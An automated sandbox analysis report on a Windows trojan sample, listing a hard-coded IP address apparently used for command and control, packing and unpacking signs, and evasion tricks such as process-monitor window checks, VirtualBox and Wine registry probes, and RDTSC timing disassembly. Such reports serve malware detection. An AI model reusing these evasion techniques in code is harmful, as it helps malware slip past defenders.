              Source: file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/h
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_003E9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C0_2_007A406C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A30B10_2_006A30B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004048B00_2_004048B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AB9D90_2_006AB9D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DFA770_2_006DFA77
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A5AD60_2_007A5AD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A0B040_2_007A0B04
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079D4540_2_0079D454
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00798C360_2_00798C36
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A25720_2_007A2572
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00772DD50_2_00772DD5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A76E50_2_007A76E5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079EF580_2_0079EF58
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A8F3F0_2_007A8F3F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079B7EC0_2_0079B7EC
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 003E4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: tlwqldfy ZLIB complexity 0.9948204093589356
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00403A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003FCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7VOACHXG.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1799168 > 1048576
              Source: file.exeStatic PE information: Raw size of tlwqldfy is bigger than: 0x100000 < 0x19d600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tlwqldfy:EW;yxhtoyxo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tlwqldfy:EW;yxhtoyxo:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00406390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b8da3 should be: 0x1c1b07
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: tlwqldfy
              Source: file.exeStatic PE information: section name: yxhtoyxo
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B04F push es; ret 0_2_0040B052
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ecx; mov dword ptr [esp], edx0_2_007A40DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebp; mov dword ptr [esp], 000004C3h0_2_007A40FB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 2C912851h; mov dword ptr [esp], edx0_2_007A41A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 2E6C5EDDh; mov dword ptr [esp], esi0_2_007A41CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push eax; mov dword ptr [esp], edi0_2_007A42FE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push eax; mov dword ptr [esp], ecx0_2_007A43B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], esi0_2_007A43E5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebx; mov dword ptr [esp], 28203E82h0_2_007A43E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], edi0_2_007A4405
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 65E06AC3h; mov dword ptr [esp], ecx0_2_007A4419
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebx; mov dword ptr [esp], esi0_2_007A4425
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 630BDEC7h; mov dword ptr [esp], edi0_2_007A446A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 03591A81h; mov dword ptr [esp], edx0_2_007A4490
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 7D62D8F3h; mov dword ptr [esp], esi0_2_007A44C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push eax; mov dword ptr [esp], edx0_2_007A4524
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 204BD816h; mov dword ptr [esp], esp0_2_007A452C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 508B0D51h; mov dword ptr [esp], ebp0_2_007A45E1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebp; mov dword ptr [esp], ecx0_2_007A4636
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 2C7ABD21h; mov dword ptr [esp], ebx0_2_007A463E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 49BE69A4h; mov dword ptr [esp], ebx0_2_007A4666
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], ebp0_2_007A46BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push esi; mov dword ptr [esp], 540E84F1h0_2_007A474F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 11E96C3Eh; mov dword ptr [esp], esi0_2_007A477F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], ebp0_2_007A478B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push eax; mov dword ptr [esp], esi0_2_007A4807
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 2211B062h; mov dword ptr [esp], edx0_2_007A48BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push ebx; mov dword ptr [esp], esp0_2_007A48C1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 3AF8F46Dh; mov dword ptr [esp], ecx0_2_007A4954
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push 38A5D187h; mov dword ptr [esp], esi0_2_007A4991
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A406C push edx; mov dword ptr [esp], eax0_2_007A49E9
              Source: file.exeStatic PE information: section name: tlwqldfy entropy: 7.954230564423373

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00406390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25833
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B058A second address: 7B0590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0590 second address: 7B0595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CF60 second address: 79CF66 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF642 second address: 7AF652 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65134596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFC4E second address: 7AFC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFD86 second address: 7AFD90 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF65134596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF0A second address: 7AFF15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2505 second address: 7B250A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B250A second address: 7B2587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 75978EBBh 0x0000000e mov si, cx 0x00000011 mov dword ptr [ebp+122D190Bh], ebx 0x00000017 push 00000003h 0x00000019 sub dword ptr [ebp+122D2D5Fh], esi 0x0000001f push 00000000h 0x00000021 mov ecx, dword ptr [ebp+122D39BBh] 0x00000027 movzx edx, di 0x0000002a push 00000003h 0x0000002c push 9647C4DCh 0x00000031 js 00007FBF65561B59h 0x00000037 jmp 00007FBF65561B53h 0x0000003c add dword ptr [esp], 29B83B24h 0x00000043 jnp 00007FBF65561B4Bh 0x00000049 or si, CF5Eh 0x0000004e lea ebx, dword ptr [ebp+124563D6h] 0x00000054 jmp 00007FBF65561B56h 0x00000059 xchg eax, ebx 0x0000005a push ecx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2587 second address: 7B2595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2595 second address: 7B2599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B268E second address: 7B2702 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 1A93BD23h 0x0000000e sub edx, dword ptr [ebp+122D3823h] 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FBF65134598h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov ch, ah 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2B2Ah], ebx 0x0000003a push 00000003h 0x0000003c and edi, 0703F48Ah 0x00000042 call 00007FBF65134599h 0x00000047 jmp 00007FBF651345A5h 0x0000004c push eax 0x0000004d pushad 0x0000004e jnp 00007FBF6513459Ch 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2702 second address: 7B270A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B270A second address: 7B2726 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF65134596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF6513459Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2726 second address: 7B2743 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65561B4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c js 00007FBF65561B50h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B284B second address: 7B28A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF65134596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 1DE92169h 0x00000012 mov edx, dword ptr [ebp+122D3937h] 0x00000018 push 00000003h 0x0000001a clc 0x0000001b sub ecx, dword ptr [ebp+122D3025h] 0x00000021 push 00000000h 0x00000023 add dword ptr [ebp+122D1911h], esi 0x00000029 push 00000003h 0x0000002b call 00007FBF6513459Fh 0x00000030 jmp 00007FBF6513459Bh 0x00000035 pop ecx 0x00000036 push DC0AFE14h 0x0000003b push eax 0x0000003c push edx 0x0000003d jno 00007FBF65134598h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B28A0 second address: 7B28D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 1C0AFE14h 0x0000000f jnp 00007FBF65561B4Ah 0x00000015 pushad 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 add ecx, dword ptr [ebp+122D36FBh] 0x0000001f lea ebx, dword ptr [ebp+124563EAh] 0x00000025 mov esi, dword ptr [ebp+122D398Fh] 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B28D1 second address: 7B28D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B28D5 second address: 7B28DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3D5D second address: 7C3D62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2786 second address: 7D278C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D278C second address: 7D2796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF65134596h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3BC1 second address: 7A3BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B57h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3BDC second address: 7A3BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D07AE second address: 7D07BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007FBF65561B46h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0A56 second address: 7D0A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0A5B second address: 7D0A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0CF3 second address: 7D0CFD instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF64DC8956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0CFD second address: 7D0D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D11AB second address: 7D11B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D11B1 second address: 7D1202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FBF64E55829h 0x0000000b jmp 00007FBF64E55826h 0x00000010 jmp 00007FBF64E55825h 0x00000015 jnp 00007FBF64E55816h 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1462 second address: 7D146E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FBF64DC8956h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D146E second address: 7D1474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A08 second address: 7C9A27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF64DC8960h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A27 second address: 7C9A2F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A2F second address: 7C9A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A35 second address: 7C9A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A39 second address: 7C9A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8A7D second address: 7A8A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8A82 second address: 7A8A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A8A8A second address: 7A8A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F15 second address: 7D1F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF64DC8956h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F22 second address: 7D1F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF64E55828h 0x00000008 jnl 00007FBF64E55816h 0x0000000e jng 00007FBF64E55816h 0x00000014 jl 00007FBF64E55816h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FBF64E55828h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1F6C second address: 7D1F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2387 second address: 7D238D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D238D second address: 7D23A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF64DC8960h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4959 second address: 7D4960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CF4 second address: 797CFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CFC second address: 797D3B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007FBF64E55816h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FBF64E55824h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBF64E55828h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA5A0 second address: 7DA5AA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF64DC8956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA9BD second address: 7DA9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA9C1 second address: 7DA9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
